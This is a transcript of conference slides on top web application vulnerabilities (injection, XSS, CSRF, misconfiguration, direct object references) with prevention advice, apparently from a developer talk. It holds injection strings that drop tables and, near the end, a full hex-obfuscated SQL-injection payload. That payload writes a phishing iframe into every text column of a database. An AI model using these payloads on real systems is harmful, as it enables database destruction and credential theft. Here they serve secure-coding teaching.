top web apps security vulnerabilities
TRANSCRIPT
![Page 1: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/1.jpg)
![Page 2: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/2.jpg)
Top Web Apps Security Vulnerabilities
Aleksandar BozinovskiTechnical Lead, Seavus
![Page 3: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/3.jpg)
![Page 4: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/4.jpg)
![Page 5: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/5.jpg)
Agenda
Importance of Web SecurityHTTP, Sessions, CookiesInjectionCross Site Scripting (XSS)Cross-Site Request Forgery (CSRF)Security MisconfigurationInsecure Direct Object References
![Page 6: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/6.jpg)
Famous Quote
“Every program has at least two purposes: the one for which it was written, and another for which it wasn't.”
-Alan J. Perlis
Alan Jay Perlis was an computer scientist known for his pioneering work in programming languages, and is the first recipient of the Turing Award.
![Page 7: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/7.jpg)
Bobby Tables
string query="INSERT INTO Students VALUES ('"+txtName.Text+"','"+txtSSN.Text+"')";
//Attack: Robert’); DROP TABLE Students;--
INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')Robert'); DROP TABLE Students;--
![Page 8: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/8.jpg)
Another one
![Page 9: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/9.jpg)
Website Security Statistics
![Page 10: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/10.jpg)
HTTP
Hypertext Transport Protocol– Language of the Web. Protocol used for
communication between web browsers and web servers
– Standard RFC 1945, 1996URL– Uniform Resource Identifier
Methods– GET, POST, PUT, HEAD, OPTIONS
![Page 11: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/11.jpg)
Statelessness, Cookies In its nature HTTP it is said to be a stateless protocol.
– i.e. from one web page to the next there is nothing in the protocol that allows a web program to maintain program “state” (like a desktop program).
– “state” can be maintained by “witchery” or “trickery” if it is needed.
Cookie – piece of data sent from a website and stored in a user's web browser while a user is browsing a website.– The Server sets the cookie in a response.– The client includes the cookies in the Http header for subsequent
requests to the server.– Example Cookie: ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
![Page 12: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/12.jpg)
Session Cookie Hijacking
![Page 13: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/13.jpg)
OWASP Top 10
![Page 14: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/14.jpg)
Injection
OWASP Definition– Injection flaws, such as SQL, OS, and LDAP
injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
![Page 15: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/15.jpg)
Injection Characteristics
![Page 16: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/16.jpg)
SQL Injection
Happens when we create query but we fail to validate and sanitize untrusted input data.
![Page 17: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/17.jpg)
Queries constructed with concatenating strings are vulnerable to SQL Injection.
SQL Queries
var categoryId = Request.QueryString["CategoryId"];var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId;
// If we enter "7 OR 1=1" in query string we end up with:SELECT * FROM Products WHERE CategoryID=7 OR 1=1
// Attacker can use ; to terminate current command and run its own commands.SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
![Page 18: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/18.jpg)
Validate untrusted data. If input data is supposed to be number, convert it to number or check it with regex.
Use parameterized SQL queries instead of strings soup.– Using stored procedures is also a good idea but keep in
mind that stored procedures are vulnerable if they concatenate strings on their own.
Use ORMs (like Entity Framework) that are inherently resistant to SQL Injection.
Prevent SQL Injection
![Page 19: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/19.jpg)
Other Injection Attacks
LDAP Injection– string ldapSearch = "(cn=" + txtSearchTerm.Text +
")";
Dynamic LINQ Injection– string where = “Table.Contains(\"" + search + "\")";
XPATH Injection– string loginExpression =
"/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
![Page 20: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/20.jpg)
Cross-Site Scripting (XSS)
OWASP Definition– XSS flaws occur whenever an application takes
untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
![Page 21: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/21.jpg)
XSS Characteristics
![Page 22: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/22.jpg)
Types of XSS AttacksStored XSS
• Stored attacks are those where the injected code is permanently stored on the target servers.
• Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
Reflected XSS• Reflected attacks are those where the injected code is reflected off
the web server, such as in an error message, search result.• Reflected attacks are delivered to victims via another route, such
as in an e-mail message, or on some other web server.
![Page 23: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/23.jpg)
Built-in protection
Modern browsers and servers employ many first line defenses against XSS by default:– ASP.NET Request Validation, present since version
2.0. In ASP.NET 4.0 it is enabled for all types of requests not just pages. To be turned off we must revert to the older mode requestValidationMode="2.0“
– Output encoding. MVC Razor view engine encodes everything by default. XSS is possible only if we use @Html.Raw()
![Page 24: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/24.jpg)
Built-in protection
– AntiXSS library is by default included in ASP.NET Web Forms 4.5. Can be retrofitted on older web apps.
– Google Chrome has built-in anti XSS protection
![Page 25: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/25.jpg)
Cross-Site Request Forgery
OWASP Definition– A CSRF attack forces a logged-on victim’s browser
to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
![Page 26: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/26.jpg)
CSRF Characteristics
![Page 27: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/27.jpg)
How CSRF works
Authenticated sessions are persisted via cookies The cookie is sent with every request to the domain
The attacking site recreates a legitimately formed request to the target site Although the request has a malicious payload (query string parameters or post data)
The victim’s browser is tricked into issuing the request For all intents and purposes, the target website views it as a legitimate request
![Page 28: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/28.jpg)
CSRF Tokens
To mitigate this risk, we can add randomness via a CSRF token
A token is a random string known to both the legitimate page where the form is and to the browser via a cookie
![Page 29: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/29.jpg)
Security Misconfiguration
OWASP Definition– Good security requires having a secure configuration
defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
![Page 30: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/30.jpg)
Characteristics
![Page 31: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/31.jpg)
Keep up to date
Your servers– Windows Server 2012 is arguably more secure
than Windows Server 2003Client browsers (if applicable)– Modern browsers include built-in defenses against
most prevalent attacksKeep your frameworks up to date
![Page 32: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/32.jpg)
Set Custom Errors, hide YSOD
![Page 33: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/33.jpg)
Turn Off Tracing
![Page 34: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/34.jpg)
Also don’t forget to turn off
ELMAH– Cases with unprotected ELMAH handlers are
notorious. – Googledork: inurl:”elmah.axd”
DEBUG– Performance penalties– Although not related with direct security risks on
its own beware of #if DEBUG statements that can disclose information
![Page 35: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/35.jpg)
Also don’t forget to turn off
Script execution on folders where not needed– Usually folders where various documents or
uploaded files are kept, unless you use App_Data folder.
HTTP Access to Logs– Log files can disclose many sensitive details about
your web app. It’s best to keep them outside of the web app root. If not possible at least keep them in App_Data.
![Page 36: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/36.jpg)
Insecure Direct Object References
OWASP Definition– A direct object reference occurs when a developer
exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
![Page 37: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/37.jpg)
Characteristics
![Page 38: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/38.jpg)
Direct Object References
– A direct object reference is an observable key used to identify an individual record in database• http://northwind.com/Products?catId=1 • http://northwind.com/Products?catId=3 • http://northwind.com/Products?catId=8
![Page 39: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/39.jpg)
Direct Object References
– Another example• http://webapp.com/Download?f=DSC01031.JPG • http://webapp.com/Download?f=DSC01032.JPG • http://webapp.com/Download?f=DSC01033.JPG
![Page 40: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/40.jpg)
Prevention Implementing proper access control– Validate user data– Implement security checks before using object reference
Access via undiscoverable surrogate keys– Integer and natural string types are vulnerable to
enumeration– A surrogate key that is not pattern-based can add further
obfuscation• A GUID is a good example
– However, it is security through obscurity
![Page 41: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/41.jpg)
Real example: phishing with obfuscated SQL injection and XSS
--1. The malicious query appends script to all text values in all tables in the database DECLARE @T varchar(255),@C varchar(4000)DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and
b.name not like '%username%' and b.name not like '%password%'OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + '' <script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like ''%http://codecamp.local/EvilSite/Login.aspx%''');
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
![Page 42: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/42.jpg)
Real example : phishing with obfuscated SQL injection and XSS
--2. The query is wrtten as one line string'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor'
--3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters.SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX))-- result: 0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
--4. Final attack is:a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as CHAR(4000));EXEC(@S)--
![Page 43: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/43.jpg)
Questions?
![Page 44: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/44.jpg)
Complete electronic evaluation forms on the computers in the hall and enter to win!– Infragistics Ultimate– Telerik DevCraft– JetBrains .NET tools – Semos training vouchers– Pluralsight subscriptions– and many more…
![Page 45: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/45.jpg)